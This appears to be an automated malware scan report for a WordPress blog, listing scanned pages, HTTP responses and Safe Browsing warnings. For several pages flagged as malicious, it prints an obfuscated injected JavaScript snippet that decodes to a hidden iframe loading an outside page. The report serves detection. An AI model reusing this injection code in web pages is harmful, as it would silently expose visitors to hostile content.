Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blog.bestoftexas.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://blog.bestoftexas.com/ | 200 OK Content-Length: 57107 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=jgsbnf!tsd>#iuuq;00ss/kf0fbso/qiq#!xjeui>1!ifjhiu>1!tuzmf>#ijeefo#!gsbnfcpsefs>1!nbshjoifjhiu>1!nbshjoxjeui>1!tdspmmjoh>op?=0jgsbnf?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://blog.bestoftexas.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/x-javascript | clean |
http://blog.bestoftexas.com/wp-content/plugins/audio-player-oogiechetos/assets/audio-player.js?ver=2.0.4.1 | 200 OK Content-Length: 11738 Content-Type: application/x-javascript | clean |
http://blog.bestoftexas.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js | 200 OK Content-Length: 34840 Content-Type: application/x-javascript | clean |
http://blog.bestoftexas.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php | 200 OK Content-Length: 25583 Content-Type: text/html | clean |
http://blog.bestoftexas.com/test404page.js | 404 Not Found Content-Length: 31106 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=jgsbnf!tsd>#iuuq;00ss/kf0fbso/qiq#!xjeui>1!ifjhiu>1!tuzmf>#ijeefo#!gsbnfcpsefs>1!nbshjoifjhiu>1!nbshjoxjeui>1!tdspmmjoh>op?=0jgsbnf?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://blog.bestoftexas.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.transitions.js | 200 OK Content-Length: 2182 Content-Type: application/x-javascript | clean |
http://blog.bestoftexas.com/wp-content/themes/str10-origin-new/javascript/date.js | 200 OK Content-Length: 507 Content-Type: application/x-javascript | clean |
http://www.projectwonderful.com/ad_display.js | 200 OK Content-Length: 1243 Content-Type: application/x-javascript | clean |
http://edge.quantserve.com/quant.js | 200 OK Content-Length: 7874 Content-Type: application/x-javascript | clean |
http://blog.bestoftexas.com//s7.addthis.com/js/250/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 09 Apr 2014 13:53:22 GMT Pragma: no-cache Location: http://blog.bestoftexas.com/s7.addthis.com/js/250/addthis_widget.js/ Server: Apache/2.2.3 (CentOS) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 09 Apr 2014 13:53:22 GMT X-Pingback: http://blog.bestoftexas.com/xmlrpc.php X-Powered-By: PHP/5.1.6 | clean |
http://blog.bestoftexas.com/s7.addthis.com/js/250/addthis_widget.js/ | 404 Not Found Content-Length: 31131 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=jgsbnf!tsd>#iuuq;00ss/kf0fbso/qiq#!xjeui>1!ifjhiu>1!tuzmf>#ijeefo#!gsbnfcpsefs>1!nbshjoifjhiu>1!nbshjoxjeui>1!tdspmmjoh>op?=0jgsbnf?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
| ||
http://blog.bestoftexas.com/feed/rss/ | 200 OK Content-Length: 5845 Content-Type: text/xml | clean |
http://blog.bestoftexas.com/feed/ | 200 OK Content-Length: 14530 Content-Type: text/xml | clean |
http://blog.bestoftexas.com/comments/feed/ | 200 OK Content-Length: 9635 Content-Type: text/xml | clean |
http://blog.bestoftexas.com/category/after-the-laughter/ | 200 OK Content-Length: 71372 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var s="=jgsbnf!tsd>#iuuq;00ss/kf0fbso/qiq#!xjeui>1!ifjhiu>1!tuzmf>#ijeefo#!gsbnfcpsefs>1!nbshjoifjhiu>1!nbshjoxjeui>1!tdspmmjoh>op?=0jgsbnf?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28){ m+= '&';} else if (s.charCodeAt(i) == 23) { m+= '!';} else { m+=String.fromCharCode(s.charCodeAt(i)-1); }}document.write(m); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: blog.bestoftexas.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 13:53:15 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://blog.bestoftexas.com/xmlrpc.php
X-Powered-By: PHP/5.1.6
GET / HTTP/1.1
Host: blog.bestoftexas.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 09 Apr 2014 13:53:15 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://blog.bestoftexas.com/xmlrpc.php
X-Powered-By: PHP/5.1.6
Second query (visit from search engine):
GET / HTTP/1.1
Host: blog.bestoftexas.com
Referer: http://www.google.com/search?q=blog.bestoftexas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: blog.bestoftexas.com
Referer: http://www.google.com/search?q=blog.bestoftexas.com
Result:
The result is similar to the first query. There are no suspicious redirects found.